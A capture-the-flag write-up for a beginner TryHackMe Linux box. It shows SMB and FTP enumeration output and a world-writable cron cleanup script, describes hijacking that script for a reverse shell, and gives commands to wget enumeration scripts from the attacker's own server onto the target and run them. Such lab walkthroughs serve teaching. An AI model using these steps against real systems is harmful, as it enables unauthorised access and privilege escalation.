Try to get the two flags! Root the machine and prove your understanding of the fundamentals! This is a virtual machine meant for beginners. Acquiring both flags will require some basic knowledge of Linux and privilege escalation methods.
For more information on Linux, check out https://tryhackme.com/room/zthlinux
As you can see, Nmap's script output is compact but already quite informative.
It tells us which SMB shares exist, which users have access to them, and, via the smb-ls script, what is inside the shares we can reach as guest.
 ==========================
|    Target Information    |
 ==========================
Target ........... 10.10.128.142
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 =====================================================
|    Enumerating Workgroup/Domain on 10.10.128.142    |
 =====================================================
[+] Got domain/workgroup name: WORKGROUP

 =============================================
|    Nbtstat Information for 10.10.128.142    |
 =============================================
Looking up status of 10.10.128.142
        ANONYMOUS       <00> -         B <ACTIVE>  Workstation Service
        ANONYMOUS       <03> -         B <ACTIVE>  Messenger Service
        ANONYMOUS       <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ======================================
|    Session Check on 10.10.128.142    |
 ======================================
[+] Server 10.10.128.142 allows sessions using username '', password ''

 ============================================
|    Getting domain SID for 10.10.128.142    |
 ============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 =======================================
|    OS information on 10.10.128.142    |
 =======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.128.142 from smbclient:
[+] Got OS info for 10.10.128.142 from srvinfo:
        ANONYMOUS      Wk Sv PrQ Unx NT SNT anonymous server (Samba, Ubuntu)
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03

 ==============================
|    Users on 10.10.128.142    |
 ==============================
index: 0x1 RID: 0x3eb acb: 0x00000010 Account: [REDACTED]        Name: [REDACTED]        Desc:

user:[[REDACTED]] rid:[0x3eb]

 ==========================================
|    Share Enumeration on 10.10.128.142    |
 ==========================================

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        [REDACTED]      Disk      My SMB Share Directory for [REDACTED]
        IPC$            IPC       IPC Service (anonymous server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.128.142
//10.10.128.142/print$          Mapping: DENIED, Listing: N/A
//10.10.128.142/[REDACTED]      Mapping: OK, Listing: OK
//10.10.128.142/IPC$            [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 =====================================================
|    Password Policy Information for 10.10.128.142    |
 =====================================================
[+] Attaching to 10.10.128.142 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
        [+] ANONYMOUS
        [+] Builtin
[+] Password Info for Domain: ANONYMOUS
        [+] Minimum password length: 5
        [+] Password history length: None
        [+] Maximum password age: 37 days 6 hours 21 minutes
        [+] Password Complexity Flags: 000000
                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0
        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes
        [+] Locked Account Duration: 30 minutes
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5

 ===============================
|    Groups on 10.10.128.142    |
 ===============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:

 ========================================================================
|    Users on 10.10.128.142 via RID cycling (RIDS: 500-550,1000-1050)    |
 ========================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2144577014-3591677122-2188425437
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\[REDACTED] (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-5-21-2144577014-3591677122-2188425437 and logon username '', password ''
S-1-5-21-2144577014-3591677122-2188425437-501 ANONYMOUS\nobody (Local User)
S-1-5-21-2144577014-3591677122-2188425437-513 ANONYMOUS\None (Domain Group)
S-1-5-21-2144577014-3591677122-2188425437-1003 ANONYMOUS\[REDACTED] (Local User)

 ==============================================
|    Getting printer info for 10.10.128.142    |
 ==============================================
No printers returned.
For the sake of space, I have removed some useless information from the output and kept only the important bits. Your output will have a lot more information.
With this you get the answer to the fourth question of Task 1.
From the information gathered so far we know there is one share we can access as guest (Mapping: OK, Listing: OK above) and one local user.
smbclient '\\10.10.128.142\[REDACTED]'
Enter WORKGROUP\users's password: (JUST LEAVE IT BLANK)
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun May 17 13:11:34 2020
  ..                                  D        0  Thu May 14 03:59:10 2020
  [REDACTED].jpg                      N    42663  Tue May 12 02:43:42 2020
  [REDACTED].jpeg                     N   265188  Tue May 12 02:43:42 2020

                20508240 blocks of size 1024. 13306640 blocks available
smb: \>
Type help to get more information about the commands you can use in smb.
The share holds two adorable pictures that we can download, but steghide cannot extract anything from them without a passphrase, so they are a dead end for now (a passphrase found later on the box could change that, so keep them).
Now let's turn our attention to FTP.
As the Nmap scan showed earlier, the FTP server accepts anonymous logins (big surprise there x0 ).
ftp $target
Connected to 10.10.128.142.
220 [REDACTED]'s FTP Server!
Name (10.10.128.142:magic): anonymous
331 Please specify the password.
Password: (LEAVE BLANK)
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts
226 Directory send OK.
ftp>
cat clean.sh
#!/bin/bash

tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
        echo "Running cleanup script: nothing to delete" >> /var/ftp/scripts/removed_files.log
else
    for LINE in $tmp_files; do
        rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
fi
Looking through them, to_do.txt is just a short note, while removed_files.log and clean.sh belong together: clean.sh is meant to delete files under /tmp and append a line for each one to /var/ftp/scripts/removed_files.log. Note that as written it never deletes anything: tmp_files is hard-coded to 0, and [ $tmp_files=0 ] is a single-word test that is always true, so every run just appends the "nothing to delete" line. A cleanup script that writes to a log like this is almost certainly being run by cron at a fixed interval (minutes, hours, days); you can confirm that, and the interval, by listing the scripts directory over FTP a few times and watching the log's size and timestamp change while nobody is logged in. (For more on cron jobs see https://ostechnix.com/a-beginners-guide-to-cron-jobs/)
Reverse Shell
If clean.sh is a cron task, we can use it to get a reverse shell: the scripts directory is world-writable (drwxrwxrwx in the listing above), so we download clean.sh, add a reverse-shell line, and upload the modified copy back over anonymous FTP. On the next scheduled run cron executes our line with the privileges of whatever user owns the job.
python3 -m http.server                              (on our machine)
wget http://$your_ip:$port/path/to/scripts           (on the remote target)
chmod +x script.to.use.sh
./script.to.use.sh | tee enum.txt
(Piping into tee saves the output to a file so you don't have to rerun the script if you lose the terminal, but it also leaves a file on the target that records what you did. If you do this, write it somewhere you will remember to clean up afterwards, or send the output back to your own machine instead of storing it on the box.)
The output of LinEnum is quite large so I'll just put in the important info that we need.